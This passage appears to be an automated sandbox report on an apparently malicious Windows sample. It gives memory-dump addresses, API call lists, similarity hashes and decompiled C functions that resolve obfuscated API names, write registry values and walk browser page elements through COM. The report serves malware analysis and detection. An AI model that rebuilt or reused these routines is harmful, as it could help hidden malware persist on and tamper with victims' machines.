0x044ba2da
0x044ba2dc
0x044ba2e6
0x044ba2eb
0x044ba2eb
0x044ba2e6
0x044ba2f2
0x044ba308
0x044ba2f4
0x044ba2f4
0x044ba301
0x044ba301
0x044ba30c
0x044ba30e
0x044ba318
0x044ba31d
0x044ba31d
0x044ba318
0x044ba324
0x044ba33a
0x044ba326
0x044ba326
0x044ba333
0x044ba333
0x044ba33e
0x044ba340
0x044ba34a
0x044ba34f
0x044ba34f
0x044ba34a
0x044ba356
0x044ba36c
0x044ba358
0x044ba358
0x044ba365
0x044ba365
0x044ba370
0x044ba372
0x044ba37c
0x044ba381
0x044ba381
0x044ba37c
0x044ba388
0x044ba39e
0x044ba38a
0x044ba38a
0x044ba397
0x044ba397
0x044ba3a2
0x044ba3a4
0x044ba3a7
0x044ba3a8
0x044ba3af
0x044ba3b1
0x044ba3b2
0x044ba3b2
0x044ba3af
0x044ba3b9
0x044ba3cf
0x044ba3bb
0x044ba3bb
0x044ba3c8
0x044ba3c8
0x044ba3d3
0x044ba3e1
0x044ba3eb
0x044ba3eb
0x044ba3f8
0x044ba404
0x044ba404

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA2B0
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA2E2
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA314
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA346
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA378
HeapFree.KERNEL32(00000000,?,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,044B2018), ref: 044BA3F8

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b26cfccd9619b8ff9b43287fa52ac8d7c8580c36e58ab6d8bd5b7c8f57fba332
Instruction ID: 16647ad8d3c11b187af516a69701d20630dd53fb6ca75bfe4a37ad7ed940954e
Opcode Fuzzy Hash: b26cfccd9619b8ff9b43287fa52ac8d7c8580c36e58ab6d8bd5b7c8f57fba332
Instruction Fuzzy Hash: 145196B0B10204AFFF28DBB99D84CDFB2ADE7487047641967A441E7205EA35F94597F0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3BFB, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 044B3C55
SysAllocString.OLEAUT32(0070006F), ref: 044B3C69
SysAllocString.OLEAUT32(00000000), ref: 044B3C7B
SysFreeString.OLEAUT32(00000000), ref: 044B3CE3
SysFreeString.OLEAUT32(00000000), ref: 044B3CF2
SysFreeString.OLEAUT32(00000000), ref: 044B3CFD

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 98ee960cc08a53b319b99d2af6d4890da2ea2c086ce0f90814d052901721d3f7
Instruction ID: cda7337675819b5931d6d728f478d4cbe6882bf04d96ddf04ac704787fd8c9a7
Opcode Fuzzy Hash: 98ee960cc08a53b319b99d2af6d4890da2ea2c086ce0f90814d052901721d3f7
Instruction Fuzzy Hash: 23413D36900A09ABDF01DFF9D8446EFB7B9EF49300F14442AED55EB210DA75A905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B14E7, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B14E7(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E044B6D10(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x44bd2a4; // 0x8ca5a8
					_t1 = _t23 + 0x44be11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x44bd2a4; // 0x8ca5a8
					_t2 = _t26 + 0x44be769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E044B45B3(_t54);
					} else {
						_t30 =  *0x44bd2a4; // 0x8ca5a8
						_t5 = _t30 + 0x44be756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x44bd2a4; // 0x8ca5a8
							_t7 = _t33 + 0x44be40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x44bd2a4; // 0x8ca5a8
								_t9 = _t36 + 0x44be4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x44bd2a4; // 0x8ca5a8
									_t11 = _t39 + 0x44be779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E044B3FD7(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x044b14f6
0x044b14fa
0x044b15bc
0x044b1500
0x044b1500
0x044b1505
0x044b1518
0x044b151a
0x044b151f
0x044b1527
0x044b152e
0x044b1530
0x044b1535
0x044b15b4
0x044b15b5
0x044b1537
0x044b1537
0x044b153c
0x044b1544
0x044b1546
0x044b154b
0x00000000
0x044b154d
0x044b154d
0x044b1552
0x044b155a
0x044b155c
0x044b1561
0x00000000
0x044b1563
0x044b1563
0x044b1568
0x044b1570
0x044b1572
0x044b1577
0x00000000
0x044b1579
0x044b1579
0x044b157e
0x044b1586
0x044b1588
0x044b158d
0x00000000
0x044b158f
0x044b1595
0x044b159a
0x044b15a1
0x044b15a6
0x044b15ab
0x00000000
0x044b15ad
0x044b15b0
0x044b15b0
0x044b15ab
0x044b158d
0x044b1577
0x044b1561
0x044b154b
0x044b1535
0x044b15ca

APIs

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B49D3,?,?,?,?,00000000,00000000), ref: 044B150C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B152E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B1544
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B155A
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B1570
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B1586

Part of subcall function 044B3FD7: memset.NTDLL ref: 044B4056

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: a09870762613897a28f22052efb0c9cf7fea8cbf04f948575341c63a7f221d8a
Instruction ID: 00d90f10859c069ed29cf1dd0ca28a134cbe5d29b410fd40e3d377a360d5147e
Opcode Fuzzy Hash: a09870762613897a28f22052efb0c9cf7fea8cbf04f948575341c63a7f221d8a
Instruction Fuzzy Hash: B621FBB160064AAFEF20DFA9C994D97B7ECEF442447118566E54ACB301D674F9058FE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B8C1A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E044B8C1A(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x44bd33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E044BA5A3(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E044B9135(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E044B45B3(_a8);
						goto L29;
					}
					_t65 =  *0x44bd2a4; // 0x8ca5a8
					_t16 = _t65 + 0x44be8cb; // 0x65696c43
					_t68 = E044BA5A3(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d044bc0
						if(E044B3D94( *_t33, _t96, _a8,  *0x44bd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x44bd2a4; // 0x8ca5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x44bea42; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x44bea3d; // 0x55434b48
								_t73 = _t34;
							}
							if(E044B4118( &_a24, _t73,  *0x44bd334,  *0x44bd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x44bd2a4; // 0x8ca5a8
									_t44 = _t75 + 0x44be856; // 0x74666f53
									_t78 = E044BA5A3(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d044bc0
										E044B407F( *_t47, _t96, _a8,  *0x44bd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d044bc0
										E044B407F( *_t49, _t96, _t103,  *0x44bd330, _a16);
										E044B45B3(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d044bc0
									E044B407F( *_t40, _t96, _a8,  *0x44bd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d044bc0
									E044B407F( *_t43, _t96, _a8,  *0x44bd330, _a16);
								}
								if( *_t105 != 0) {
									E044B45B3(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d044bc0
					if(E044B424B( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d044bc0
							E044B3D94( *_t26, _t96, _a8, _a24, _t104);
						}
						E044B45B3(_t104);
						_t102 = _a16;
					}
					E044B45B3(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x44bd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x044b8c1a
0x044b8c23
0x044b8c2a
0x044b8c2f
0x044b8c9e
0x044b8ca4
0x044b8ca9
0x044b8cb2
0x044b8cb7
0x044b8cbc
0x044b8e30
0x044b8e37
0x044b8e37
0x044b8e3c
0x044b8e3e
0x044b8e3e
0x044b8e47
0x044b8e47
0x044b8cc2
0x044b8cce
0x044b8e26
0x044b8e29
0x00000000
0x044b8e29
0x044b8cd4
0x044b8cd9
0x044b8ce2
0x044b8ce7
0x044b8cec
0x044b8d36
0x044b8d36
0x044b8d49
0x044b8d53
0x044b8d59
0x044b8d60
0x044b8d6a
0x044b8d6a
0x044b8d62
0x044b8d62
0x044b8d62
0x044b8d62
0x044b8d8c
0x044b8d94
0x044b8dc2
0x044b8dc7
0x044b8dd0
0x044b8dd5
0x044b8dd9
0x044b8e0b
0x044b8ddb
0x044b8de8
0x044b8deb
0x044b8dfb
0x044b8dfe
0x044b8e04
0x044b8e04
0x044b8d96
0x044b8da3
0x044b8da6
0x044b8db8
0x044b8dbb
0x044b8dbb
0x044b8e15
0x044b8e21
0x044b8e17
0x044b8e1a
0x044b8e1a
0x044b8e15
0x044b8d8c
0x00000000
0x044b8d53
0x044b8cfb
0x044b8d05
0x044b8d07
0x044b8d0c
0x044b8d10
0x044b8d12
0x044b8d1d
0x044b8d20
0x044b8d20
0x044b8d26
0x044b8d2b
0x044b8d2b
0x044b8d31
0x00000000
0x044b8d31
0x044b8c34
0x00000000
0x044b8c5b
0x044b8c66
0x044b8c7c
0x044b8c82
0x044b8c8a
0x00000000
0x044b8c8a

APIs

StrChrA.SHLWAPI(044B81E5,0000005F,00000000,00000000,00000104), ref: 044B8C4D
memcpy.NTDLL(?,044B81E5,?), ref: 044B8C66
lstrcpy.KERNEL32(?), ref: 044B8C7C

Part of subcall function 044BA5A3: lstrlen.KERNEL32(?,00000000,044BD330,00000001,044B453C,044BD00C,044BD00C,00000000,00000005,00000000,00000000,?,?,?,044B857A,?), ref: 044BA5AC
Part of subcall function 044BA5A3: mbstowcs.NTDLL ref: 044BA5D3
Part of subcall function 044BA5A3: memset.NTDLL ref: 044BA5E5

Part of subcall function 044B407F: lstrlenW.KERNEL32(044B81E5,?,?,044B8DF0,3D044BC0,80000002,044B81E5,044B82F9,74666F53,4D4C4B48,044B82F9,?,3D044BC0,80000002,044B81E5,?), ref: 044B409F

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

lstrcpy.KERNEL32(?,00000000), ref: 044B8C9E

Strings

\, xrefs: 044B8C82

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 777e3a4eb7edfff7775206543255192290844ff0953dbe3990af39c0d84e8b3e
Instruction ID: c4d1f1c331e723e4cef898be4022ec22affc7c0741c31d8074609140657abd21
Opcode Fuzzy Hash: 777e3a4eb7edfff7775206543255192290844ff0953dbe3990af39c0d84e8b3e
Instruction Fuzzy Hash: D1517E7150060AEFEF21AFA1DD40EDB37BDEF04314F00855AFA94A6122D735E9259BA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3970, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E044B3970(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x44bd114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x44bd238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x044b3978
0x044b397b
0x044b397d
0x044b3986
0x044b3998
0x044b3998
0x044b399c
0x044b399e
0x044b39a1
0x044b39a4
0x044b39ad
0x044b39b7
0x044b39bb
0x044b39c0
0x044b39d6
0x044b39da
0x044b3a2b
0x044b39dc
0x044b39dc
0x044b39e4
0x044b39f3
0x044b39f8
0x044b3a08
0x044b3a0e
0x044b3a19
0x044b3a23
0x044b3a27
0x044b3a27
0x044b39da
0x044b3a32
0x044b3a39

APIs

lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 044B39A4
RtlAllocateHeap.NTDLL(00000000,?), ref: 044B39D0
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 044B39E4
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 044B39F3
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 044B3A0E

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: f7f30ed5d962c4e6ce4a6efdea7be0a10e1be83cfc37ba20e878b6f64ea583ad
Instruction ID: 94903af8fefc1f2516d4faf7a4dc78133cdd1c08dd8760b3aef4de85f438702c
Opcode Fuzzy Hash: f7f30ed5d962c4e6ce4a6efdea7be0a10e1be83cfc37ba20e878b6f64ea583ad
Instruction Fuzzy Hash: D821AE36900249AFDF019FA9C884ADEBF79EF88304F198059EC84AB301C734E915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3F5E, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E044B3F5E(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E044B4F14(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E044BA77A(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x44bd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x044b3f5e
0x044b3f6b
0x044b3f6d
0x044b3fd0
0x00000000
0x044b3fd0
0x044b3f85
0x044b3f8c
0x044b3f98
0x044b3f9d
0x044b3f9f
0x044b3fa1
0x044b3fa3
0x044b3fa5
0x044b3fa7
0x044b3fb3
0x044b3fc3
0x00000000
0x044b3fb5
0x044b3fb5
0x044b3fbc
0x044b3fc9
0x044b3fc9
0x044b3fc9
0x044b3fbc
0x044b3fb3
0x044b3fce
0x00000000
0x00000000
0x044b3fd4

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,044B519D,?,?,751881D0,00000000), ref: 044B3F98
ResetEvent.KERNEL32(?), ref: 044B3F9D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?,?), ref: 044B3FB5
GetLastError.KERNEL32(?,?,00000102,044B519D,?,?,751881D0,00000000), ref: 044B3FD0

Part of subcall function 044B4F14: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,044B3F7D,?,?,?,?,00000102,044B519D,?,?,751881D0), ref: 044B4F20
Part of subcall function 044B4F14: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B3F7D,?,?,?,?,00000102,044B519D,?), ref: 044B4F7E
Part of subcall function 044B4F14: lstrcpy.KERNEL32(00000000,00000000), ref: 044B4F8E

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?), ref: 044B3FC3

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 6b60a6b211a49f5bf54d31dde6f260c490fb300bae28b1fcba05127fcdd94931
Instruction ID: d3555d01401c8ac406dcab25c5b93d6cfd627ad935fe23d674cad0170351654a
Opcode Fuzzy Hash: 6b60a6b211a49f5bf54d31dde6f260c490fb300bae28b1fcba05127fcdd94931
Instruction Fuzzy Hash: FB016D31204601ABEF306E72DC84F9BB6B8EF44764F104A2AF991911E0D731F815EAF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3B0B, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B3B0B(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x44bd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x44bd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x44bd258 = _t6;
					 *0x44bd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x44bd254 = _t7;
					if(_t7 == 0) {
						 *0x44bd254 =  *0x44bd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x044b3b13
0x044b3b19
0x044b3b20
0x00000000
0x044b3b7a
0x044b3b22
0x044b3b2a
0x044b3b37
0x044b3b37
0x044b3b77
0x00000000
0x044b3b77
0x044b3b39
0x044b3b39
0x044b3b3e
0x044b3b50
0x044b3b55
0x044b3b5b
0x044b3b61
0x044b3b68
0x044b3b6a
0x044b3b6a
0x00000000
0x044b3b71
0x044b3b33
0x00000000
0x00000000
0x044b3b35
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,044B56AC,?), ref: 044B3B13
GetVersion.KERNEL32 ref: 044B3B22
GetCurrentProcessId.KERNEL32 ref: 044B3B3E
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 044B3B5B
GetLastError.KERNEL32 ref: 044B3B7A

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 210089dc85b4048c13d50c89c005bf62c6def0f51d8c4304b9cf0e2d03dbb7e4
Instruction ID: 003b55670306bd49c23b681d546a6dae8b98bf800a30056c19274274cc08895e
Opcode Fuzzy Hash: 210089dc85b4048c13d50c89c005bf62c6def0f51d8c4304b9cf0e2d03dbb7e4
Instruction Fuzzy Hash: A2F0A4B4A48382EBFF248F659C9AB567B60E744755F00011FE9C2C62C5D678E801CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 044B4B71, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E044B4B71(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x44bd2a4; // 0x8ca5a8
					_t5 = _t103 + 0x44be038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x44bc298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x44bd2a4; // 0x8ca5a8
												_t28 = _t109 + 0x44be0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x44bd2a4; // 0x8ca5a8
														_t33 = _t79 + 0x44be078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
